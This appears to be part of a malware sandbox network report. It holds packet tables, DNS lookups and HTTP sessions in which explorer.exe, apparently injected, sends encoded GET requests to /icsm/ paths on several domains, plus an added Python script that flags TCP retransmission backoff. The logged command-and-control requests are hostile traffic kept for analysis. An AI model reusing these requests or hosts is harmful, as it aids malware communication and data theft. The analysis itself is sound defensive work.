May 12, 2021 06:11:18.904484034 CEST | 80 | 49720 | 85.233.160.22 | 192.168.2.5
May 12, 2021 06:11:24.164902925 CEST | 49724 | 80 | 192.168.2.5 | 150.95.255.38
May 12, 2021 06:11:24.480098009 CEST | 80 | 49724 | 150.95.255.38 | 192.168.2.5
May 12, 2021 06:11:24.480214119 CEST | 49724 | 80 | 192.168.2.5 | 150.95.255.38
May 12, 2021 06:11:24.480335951 CEST | 49724 | 80 | 192.168.2.5 | 150.95.255.38
May 12, 2021 06:11:24.793428898 CEST | 80 | 49724 | 150.95.255.38 | 192.168.2.5
May 12, 2021 06:11:24.793498039 CEST | 80 | 49724 | 150.95.255.38 | 192.168.2.5
May 12, 2021 06:11:24.793528080 CEST | 80 | 49724 | 150.95.255.38 | 192.168.2.5
May 12, 2021 06:11:24.793703079 CEST | 49724 | 80 | 192.168.2.5 | 150.95.255.38
May 12, 2021 06:11:24.795022964 CEST | 49724 | 80 | 192.168.2.5 | 150.95.255.38
May 12, 2021 06:11:25.107990026 CEST | 80 | 49724 | 150.95.255.38 | 192.168.2.5
May 12, 2021 06:11:27.307744980 CEST | 49718 | 80 | 192.168.2.5 | 62.149.189.71
May 12, 2021 06:11:29.894157887 CEST | 49725 | 80 | 192.168.2.5 | 8.210.40.49
May 12, 2021 06:11:30.170943022 CEST | 80 | 49725 | 8.210.40.49 | 192.168.2.5
May 12, 2021 06:11:30.171107054 CEST | 49725 | 80 | 192.168.2.5 | 8.210.40.49
May 12, 2021 06:11:30.171286106 CEST | 49725 | 80 | 192.168.2.5 | 8.210.40.49
May 12, 2021 06:11:30.447992086 CEST | 80 | 49725 | 8.210.40.49 | 192.168.2.5
May 12, 2021 06:11:30.448025942 CEST | 80 | 49725 | 8.210.40.49 | 192.168.2.5
May 12, 2021 06:11:30.448041916 CEST | 80 | 49725 | 8.210.40.49 | 192.168.2.5
May 12, 2021 06:11:30.448206902 CEST | 49725 | 80 | 192.168.2.5 | 8.210.40.49
May 12, 2021 06:11:30.448276997 CEST | 49725 | 80 | 192.168.2.5 | 8.210.40.49
May 12, 2021 06:11:30.725559950 CEST | 80 | 49725 | 8.210.40.49 | 192.168.2.5
May 12, 2021 06:11:45.730526924 CEST | 49727 | 80 | 192.168.2.5 | 34.102.136.180
May 12, 2021 06:11:45.771503925 CEST | 80 | 49727 | 34.102.136.180 | 192.168.2.5
May 12, 2021 06:11:45.771606922 CEST | 49727 | 80 | 192.168.2.5 | 34.102.136.180
May 12, 2021 06:11:45.772072077 CEST | 49727 | 80 | 192.168.2.5 | 34.102.136.180
May 12, 2021 06:11:45.813093901 CEST | 80 | 49727 | 34.102.136.180 | 192.168.2.5
May 12, 2021 06:11:45.909532070 CEST | 80 | 49727 | 34.102.136.180 | 192.168.2.5
May 12, 2021 06:11:45.909596920 CEST | 80 | 49727 | 34.102.136.180 | 192.168.2.5
May 12, 2021 06:11:45.909837008 CEST | 49727 | 80 | 192.168.2.5 | 34.102.136.180
May 12, 2021 06:11:45.909900904 CEST | 49727 | 80 | 192.168.2.5 | 34.102.136.180
May 12, 2021 06:11:45.950901031 CEST | 80 | 49727 | 34.102.136.180 | 192.168.2.5
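One flow in that list behaves differently from the rest: on port 49718 to 62.149.189.71 the server's last packet arrives at 06:11:08.363, after which the client alone sends at 06:11:08.665, 09.275, 10.478, 12.884, 17.697 and 27.307, gaps of roughly 0.3, 0.6, 1.2, 2.4, 4.8 and 9.6 seconds. A doubling series with no reply is consistent with TCP retransmission backoff after the peer stopped answering, and it is easy to miss in a flat packet table. The script below is an added example, not part of the report: it rebuilds flows from a packet list, counts packets per direction, and flags flows whose client-only tail shows consecutive gap doublings. The packet lines are constructed from the two flows on ports 49718 and 49720 in the table above, with timestamps truncated to microseconds.

```python
"""Rebuild TCP flows from a packet list like the table above and flag flows
whose client keeps sending with doubling gaps after the server has gone
silent, the shape TCP retransmission backoff leaves in a packet log."""
from collections import defaultdict
from datetime import datetime

VICTIM = "192.168.2.5"

# CONSTRUCTED from two flows in the table (victim ports 49718 and 49720),
# timestamps truncated to microseconds; one "timestamp,sport,dport,src,dst" per line.
PACKETS = """\
2021-05-12 06:11:08.246844,49718,80,192.168.2.5,62.149.189.71
2021-05-12 06:11:08.305356,80,49718,62.149.189.71,192.168.2.5
2021-05-12 06:11:08.305533,49718,80,192.168.2.5,62.149.189.71
2021-05-12 06:11:08.305753,49718,80,192.168.2.5,62.149.189.71
2021-05-12 06:11:08.362505,80,49718,62.149.189.71,192.168.2.5
2021-05-12 06:11:08.363512,80,49718,62.149.189.71,192.168.2.5
2021-05-12 06:11:08.363538,80,49718,62.149.189.71,192.168.2.5
2021-05-12 06:11:08.363763,49718,80,192.168.2.5,62.149.189.71
2021-05-12 06:11:08.363837,49718,80,192.168.2.5,62.149.189.71
2021-05-12 06:11:08.665510,49718,80,192.168.2.5,62.149.189.71
2021-05-12 06:11:09.275211,49718,80,192.168.2.5,62.149.189.71
2021-05-12 06:11:10.478286,49718,80,192.168.2.5,62.149.189.71
2021-05-12 06:11:12.884835,49718,80,192.168.2.5,62.149.189.71
2021-05-12 06:11:17.697598,49718,80,192.168.2.5,62.149.189.71
2021-05-12 06:11:27.307744,49718,80,192.168.2.5,62.149.189.71
2021-05-12 06:11:18.743036,49720,80,192.168.2.5,85.233.160.22
2021-05-12 06:11:18.795769,80,49720,85.233.160.22,192.168.2.5
2021-05-12 06:11:18.796403,49720,80,192.168.2.5,85.233.160.22
2021-05-12 06:11:18.796605,49720,80,192.168.2.5,85.233.160.22
2021-05-12 06:11:18.848905,80,49720,85.233.160.22,192.168.2.5
2021-05-12 06:11:18.849797,80,49720,85.233.160.22,192.168.2.5
2021-05-12 06:11:18.849983,80,49720,85.233.160.22,192.168.2.5
2021-05-12 06:11:18.850141,49720,80,192.168.2.5,85.233.160.22
2021-05-12 06:11:18.850188,49720,80,192.168.2.5,85.233.160.22
2021-05-12 06:11:18.904484,80,49720,85.233.160.22,192.168.2.5
"""


def parse_packets(text):
    """CSV-like lines -> list of (timestamp, sport, dport, src, dst)."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sport, dport, src, dst = line.split(",")
        rows.append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f"), int(sport), int(dport), src, dst))
    return rows


def group_flows(rows, client=VICTIM):
    """Key every packet by (client port, server ip, server port) regardless of
    direction, and tag it c2s or s2c. Input order does not matter."""
    flows = defaultdict(list)
    for ts, sport, dport, src, dst in rows:
        if src == client:
            key, direction = (sport, dst, dport), "c2s"
        else:
            key, direction = (dport, src, sport), "s2c"
        flows[key].append((ts, direction))
    return {k: sorted(v) for k, v in flows.items()}


def backoff_doublings(pkts, min_gap=0.1, lo=1.5, hi=2.5):
    """Longest run of consecutive gap doublings (ratio in [lo, hi]) among the
    client's packets sent after the server's last packet. Gaps under min_gap
    are ignored so back-to-back ACK/FIN packets do not start a run. 0 when the
    server answered last."""
    last_srv = max((i for i, (_, d) in enumerate(pkts) if d == "s2c"), default=-1)
    tail = [ts for ts, d in pkts[last_srv + 1:] if d == "c2s"]
    gaps = [(b - a).total_seconds() for a, b in zip(tail, tail[1:])]
    best = run = 0
    for g0, g1 in zip(gaps, gaps[1:]):
        if g0 >= min_gap and lo <= g1 / g0 <= hi:
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def summarize(text=PACKETS, client=VICTIM):
    """Per server: client port, packets each way, duration, backoff doublings."""
    out = {}
    for (cport, server, _), pkts in group_flows(parse_packets(text), client).items():
        c2s = sum(1 for _, d in pkts if d == "c2s")
        out[server] = {"client_port": cport, "c2s": c2s, "s2c": len(pkts) - c2s,
                       "duration_s": round((pkts[-1][0] - pkts[0][0]).total_seconds(), 3),
                       "backoff_doublings": backoff_doublings(pkts)}
    return out


if __name__ == "__main__":
    for server, s in summarize().items():
        verdict = "server went silent, client retrying" if s["backoff_doublings"] >= 3 else "completed"
        print(server, s, verdict)
```

Three or more doublings is a conservative threshold; a single large gap can be a slow server, but a 0.3/0.6/1.2/2.4 series with nothing coming back is the client's TCP stack, not the application, and tells you the host accepted the connection and then dropped it mid-exchange.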

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 12, 2021 06:09:34.283843994 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:34.335406065 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:34.902295113 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:34.959502935 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:35.709083080 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:35.762042999 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:37.292479992 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:37.341233015 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:37.589746952 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:37.649698973 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:39.478003025 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:39.526659012 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:40.772716045 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:40.821523905 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:42.004847050 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:42.053600073 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:43.216428995 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:43.265111923 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:45.508809090 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:45.557526112 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:47.106349945 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:47.157958031 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:48.625264883 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:48.673979998 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:09:49.491476059 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:09:49.551354885 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:10:00.726229906 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:10:00.786649942 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:10:21.639175892 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:10:21.707287073 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:10:49.304970980 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:10:49.363789082 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:10:52.420631886 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:10:52.571346045 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:10:57.795087099 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:10:57.885720015 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:03.061557055 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:03.124828100 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:08.172087908 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:08.245578051 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:13.373060942 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:13.436161995 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:18.654652119 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:18.741679907 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:20.400882006 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:20.475410938 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:22.926269054 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:22.985301018 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:23.877700090 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:24.163995981 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:29.830585957 CEST | 53813 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:29.892627001 CEST | 53 | 53813 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:35.455265045 CEST | 63732 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:35.520087004 CEST | 53 | 63732 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:40.179445982 CEST | 57344 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:40.244952917 CEST | 53 | 57344 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:40.564667940 CEST | 54450 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:40.639816046 CEST | 53 | 54450 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:45.658201933 CEST | 59261 | 53 | 192.168.2.5 | 8.8.8.8
May 12, 2021 06:11:45.726883888 CEST | 53 | 59261 | 8.8.8.8 | 192.168.2.5
May 12, 2021 06:11:50.920507908 CEST | 57151 | 53 | 192.168.2.5 | 8.8.8.8
                                                                      May 12, 2021 06:11:51.080497026 CEST53571518.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:56.217856884 CEST5941353192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:56.303303003 CEST53594138.8.8.8192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 12, 2021 06:10:52.420631886 CEST | 192.168.2.5 | 8.8.8.8 | 0xbbd8 | Standard query (0) | www.roastedorganic.com | A (IP address) | IN (0x0001)
May 12, 2021 06:10:57.795087099 CEST | 192.168.2.5 | 8.8.8.8 | 0xe9dd | Standard query (0) | www.voiceclubdubai.com | A (IP address) | IN (0x0001)
May 12, 2021 06:11:03.061557055 CEST | 192.168.2.5 | 8.8.8.8 | 0x469b | Standard query (0) | www.w-c727or.net | A (IP address) | IN (0x0001)
May 12, 2021 06:11:08.172087908 CEST | 192.168.2.5 | 8.8.8.8 | 0xbc63 | Standard query (0) | www.geacasolaro.com | A (IP address) | IN (0x0001)
May 12, 2021 06:11:13.373060942 CEST | 192.168.2.5 | 8.8.8.8 | 0x4d71 | Standard query (0) | www.charmboutiques.com | A (IP address) | IN (0x0001)
May 12, 2021 06:11:18.654652119 CEST | 192.168.2.5 | 8.8.8.8 | 0x3c70 | Standard query (0) | www.websitemax.co.uk | A (IP address) | IN (0x0001)
May 12, 2021 06:11:23.877700090 CEST | 192.168.2.5 | 8.8.8.8 | 0x73a4 | Standard query (0) | www.year-action.xyz | A (IP address) | IN (0x0001)
May 12, 2021 06:11:29.830585957 CEST | 192.168.2.5 | 8.8.8.8 | 0x6819 | Standard query (0) | www.hdjakdhf.com | A (IP address) | IN (0x0001)
May 12, 2021 06:11:35.455265045 CEST | 192.168.2.5 | 8.8.8.8 | 0xa038 | Standard query (0) | www.kantan-sedori.com | A (IP address) | IN (0x0001)
May 12, 2021 06:11:40.564667940 CEST | 192.168.2.5 | 8.8.8.8 | 0x59cb | Standard query (0) | www.shanghainternational.com | A (IP address) | IN (0x0001)
May 12, 2021 06:11:45.658201933 CEST | 192.168.2.5 | 8.8.8.8 | 0x88a8 | Standard query (0) | www.susanestuart.com | A (IP address) | IN (0x0001)
May 12, 2021 06:11:50.920507908 CEST | 192.168.2.5 | 8.8.8.8 | 0x80de | Standard query (0) | www.algaeflipflops.com | A (IP address) | IN (0x0001)
May 12, 2021 06:11:56.217856884 CEST | 192.168.2.5 | 8.8.8.8 | 0x2892 | Standard query (0) | www.thelordnelsonwinthorpe.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 12, 2021 06:10:52.571346045 CEST | 8.8.8.8 | 192.168.2.5 | 0xbbd8 | No error (0) | www.roastedorganic.com |  | 75.2.115.196 | A (IP address) | IN (0x0001)
May 12, 2021 06:10:57.885720015 CEST | 8.8.8.8 | 192.168.2.5 | 0xe9dd | No error (0) | www.voiceclubdubai.com | voiceclubdubai.com |  | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 06:10:57.885720015 CEST | 8.8.8.8 | 192.168.2.5 | 0xe9dd | No error (0) | voiceclubdubai.com |  | 91.148.168.141 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:03.124828100 CEST | 8.8.8.8 | 192.168.2.5 | 0x469b | Name error (3) | www.w-c727or.net | none | none | A (IP address) | IN (0x0001)
May 12, 2021 06:11:08.245578051 CEST | 8.8.8.8 | 192.168.2.5 | 0xbc63 | No error (0) | www.geacasolaro.com |  | 62.149.189.71 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:13.436161995 CEST | 8.8.8.8 | 192.168.2.5 | 0x4d71 | No error (0) | www.charmboutiques.com | charmbracelet-shop.myshopify.com |  | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 06:11:13.436161995 CEST | 8.8.8.8 | 192.168.2.5 | 0x4d71 | No error (0) | charmbracelet-shop.myshopify.com | shops.myshopify.com |  | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 06:11:13.436161995 CEST | 8.8.8.8 | 192.168.2.5 | 0x4d71 | No error (0) | shops.myshopify.com |  | 23.227.38.74 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:18.741679907 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c70 | No error (0) | www.websitemax.co.uk | webforward.lcn.com |  | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 06:11:18.741679907 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c70 | No error (0) | webforward.lcn.com | fwd3.hosts.co.uk |  | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 06:11:18.741679907 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c70 | No error (0) | fwd3.hosts.co.uk |  | 85.233.160.22 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:18.741679907 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c70 | No error (0) | fwd3.hosts.co.uk |  | 85.233.160.24 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:18.741679907 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c70 | No error (0) | fwd3.hosts.co.uk |  | 85.233.160.23 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:24.163995981 CEST | 8.8.8.8 | 192.168.2.5 | 0x73a4 | No error (0) | www.year-action.xyz |  | 150.95.255.38 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:29.892627001 CEST | 8.8.8.8 | 192.168.2.5 | 0x6819 | No error (0) | www.hdjakdhf.com |  | 8.210.40.49 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:35.520087004 CEST | 8.8.8.8 | 192.168.2.5 | 0xa038 | Name error (3) | www.kantan-sedori.com | none | none | A (IP address) | IN (0x0001)
May 12, 2021 06:11:40.639816046 CEST | 8.8.8.8 | 192.168.2.5 | 0x59cb | Name error (3) | www.shanghainternational.com | none | none | A (IP address) | IN (0x0001)
May 12, 2021 06:11:45.726883888 CEST | 8.8.8.8 | 192.168.2.5 | 0x88a8 | No error (0) | www.susanestuart.com | susanestuart.com |  | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 06:11:45.726883888 CEST | 8.8.8.8 | 192.168.2.5 | 0x88a8 | No error (0) | susanestuart.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:51.080497026 CEST | 8.8.8.8 | 192.168.2.5 | 0x80de | No error (0) | www.algaeflipflops.com |  | 64.190.62.111 | A (IP address) | IN (0x0001)
May 12, 2021 06:11:56.303303003 CEST | 8.8.8.8 | 192.168.2.5 | 0x2892 | No error (0) | www.thelordnelsonwinthorpe.com |  | 94.136.40.51 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.roastedorganic.com
• www.voiceclubdubai.com
• www.geacasolaro.com
• www.charmboutiques.com
• www.websitemax.co.uk
• www.year-action.xyz
• www.hdjakdhf.com
• www.susanestuart.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49716 | 75.2.115.196 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 06:10:52.620214939 CEST | 1331 | OUT | GET /icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT HTTP/1.1
Host: www.roastedorganic.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 06:10:52.777667046 CEST | 1332 | IN | HTTP/1.1 403 Forbidden
Date: Wed, 12 May 2021 04:10:52 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Server: nginx
Vary: Accept-Encoding
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49717 | 91.148.168.141 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 06:10:57.964154959 CEST | 1333 | OUT | GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH HTTP/1.1
Host: www.voiceclubdubai.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 06:10:58.051840067 CEST | 1333 | IN | HTTP/1.1 403 Forbidden
Date: Wed, 12 May 2021 04:10:58 GMT
Server: Apache
Content-Length: 318
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49718 | 62.149.189.71 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 06:11:08.305753946 CEST | 1334 | OUT | GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh HTTP/1.1
Host: www.geacasolaro.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 06:11:08.363512993 CEST | 1335 | IN | HTTP/1.1 404 Not Found
Server: openresty
Date: Wed, 12 May 2021 04:11:08 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 253
Connection: close
X-Varnish: 824312071
Retry-After: 5
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 20 20 3c 68 33 3e 47 75 72 75 20 4d 65 64 69 74 61 74 69 6f 6e 3a 3c 2f 68 33 3e 0a 20 20 20 20 3c 70 3e 58 49 44 3a 20 38 32 34 33 31 32 30 37 31 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 3e 0a 20 20 20 20 3c 70 3e 56 61 72 6e 69 73 68 20 63 61 63 68 65 20 73 65 72 76 65 72 3c 2f 70 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html> <head> <title>404 Not Found</title> </head> <body> <h1>Error 404 Not Found</h1> <p>Not Found</p> <h3>Guru Meditation:</h3> <p>XID: 824312071</p> <hr> <p>Varnish cache server</p> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49719 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 06:11:13.482528925 CEST | 1336 | OUT | GET /icsm/?zZSlDz=abv0Zjoypqon102KK4Aabri2R1obo2mniMfeUFfIxPUpBgCKzPX+m7Nu7myx3UJKSvBt&b6jPH=FBZdWxvpgT HTTP/1.1
Host: www.charmboutiques.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 06:11:13.647634983 CEST | 1337 | IN | HTTP/1.1 403 Forbidden
Date: Wed, 12 May 2021 04:11:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Sorting-Hat-PodId: 163
X-Sorting-Hat-ShopId: 46720286884
X-Dc: gcp-us-central1
X-Request-ID: 8ba024b4-24d2-42c4-a108-db837ba28889
X-XSS-Protection: 1; mode=block
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
CF-Cache-Status: DYNAMIC
cf-request-id: 0a005e9cec00004a5bb7b08000000001
Server: cloudflare
CF-RAY: 64e0cd417cd24a5b-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
